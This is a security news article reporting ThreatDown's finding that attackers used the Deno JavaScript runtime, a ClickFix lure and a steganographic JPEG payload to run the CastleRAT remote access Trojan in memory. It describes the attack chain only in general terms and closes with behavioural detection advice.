SecurityBrief India - Technology news for CISOs & cybersecurity decision-makers
India
Dark office pc abstract code symbolizing fileless malware night scene
#
EDR
#
Cybersecurity
#
Keylogging

Attackers abuse Deno runtime to deploy fileless malware

Thu, 12th Mar 2026
Author image
By Catherine Knowles, News Editor

ThreatDown has reported what it describes as the first known case of attackers abusing the Deno JavaScript runtime to run fileless malware and evade endpoint defences.

ThreatDown's Endpoint Detection and Response team identified a multi-stage attack chain that culminated in the deployment of CastleRAT, a remote access Trojan. The malware runs entirely in system memory and does not appear on disk as a conventional executable.

The company said the approach signals a shift away from malicious binaries that antivirus engines can scan on disk. Instead, the chain centres on a legitimate, code-signed developer tool that is widely used and may draw less scrutiny from security products focused on file-based detection.

Attackers have long used legitimate tools already present on operating systems in so-called living-off-the-land activity. ThreatDown described the Deno case as an expansion of that concept into third-party developer runtimes.

"This is the first time we've seen attackers co-opt the Deno runtime in the wild, and it signals a broader shift in how threat actors think about evasion," said Marco Giuliani, vice president and head of research at ThreatDown.

"Deno is legitimate software that security products trust. By exploiting that trust, attackers can execute malicious code in ways many endpoint defences aren't designed to monitor," Giuliani said.

The research was led by Lorenzo Corazzi, a malware research engineer at ThreatDown.

ClickFix lure

According to ThreatDown, the intrusion begins with a social engineering technique known as ClickFix. Victims see a fake browser error or CAPTCHA-style prompt that instructs them to copy and paste a command into their system.

Because the user executes the initial command themselves, this step can bypass some web security controls. The command then downloads and installs Deno on the device.

Deno is an open-source JavaScript and TypeScript runtime used for scripting and application work. ThreatDown said its legitimacy and code-signing can create a trust gap when security tools pay more attention to unknown executables written to disk than to actions inside a trusted process.

Image payload

The next phase uses steganography, which hides data inside an otherwise ordinary file. ThreatDown said the attackers concealed an encrypted malware payload inside a JPEG image.

A script decodes the image and injects the payload directly into memory. By avoiding an executable on the hard drive, the chain reduces the chance of detection by tools that scan files at rest.

ThreatDown described the result as a fileless infection-malware that runs in memory and leaves limited artefacts on disk-which can complicate incident response and post-compromise forensics.

CastleRAT access

Once running, CastleRAT acts as a remote access Trojan with spyware functions, ThreatDown said. It supports credential theft, surveillance and remote command execution.

ThreatDown said the malware can perform keylogging and hijack clipboard contents, including cryptocurrency wallet information. It can also activate webcams and microphones for monitoring.

ThreatDown said CastleRAT uses covert communication mechanisms and can establish persistence across reboots. It also hides behind legitimate processes and abuses Windows APIs.

Detection approach

ThreatDown said it detects and blocks the attack chain at multiple stages, identifying components as Trojan.CastleLoader and Trojan.CastleRAT.

It emphasised behavioural monitoring as a key defence. Rather than relying on file scanning, monitoring should focus on runtime behaviour, process execution anomalies and suspicious outbound communications consistent with command-and-control traffic.

The use of Deno adds to a broader trend of attackers exploiting legitimate tools that blend into normal environments. Developer runtimes, scripting engines and signed binaries can provide cover because they often exist in corporate estates and may appear routine to users and some security controls.

ThreatDown said Deno served as the execution framework for obfuscated scripts in this case and warned that organisations may need to expand monitoring beyond traditional executables and operating system utilities.

Giuliani said the incident reflects evolving evasion methods that shift the battleground from malicious files to trusted processes and in-memory execution.

Related stories
KPMG & INSEAD launch AI governance principles for boards
VIPRE launches cybersecurity training for students
Sonatype warns of surge in trusted open-source malware
Cyber security chiefs split on quantum threat urgency
Gigamon eyes AI-led surge in network observability

Top stories

Splashtop launches unified IT platform for endpoints
HackerEarth launches AI interview tool for technical hiring
Trustifi adds AI video training for MSP phishing drills
OpenAI expands cyber access for verified defenders
Denodo study flags trust gap in agentic AI adoption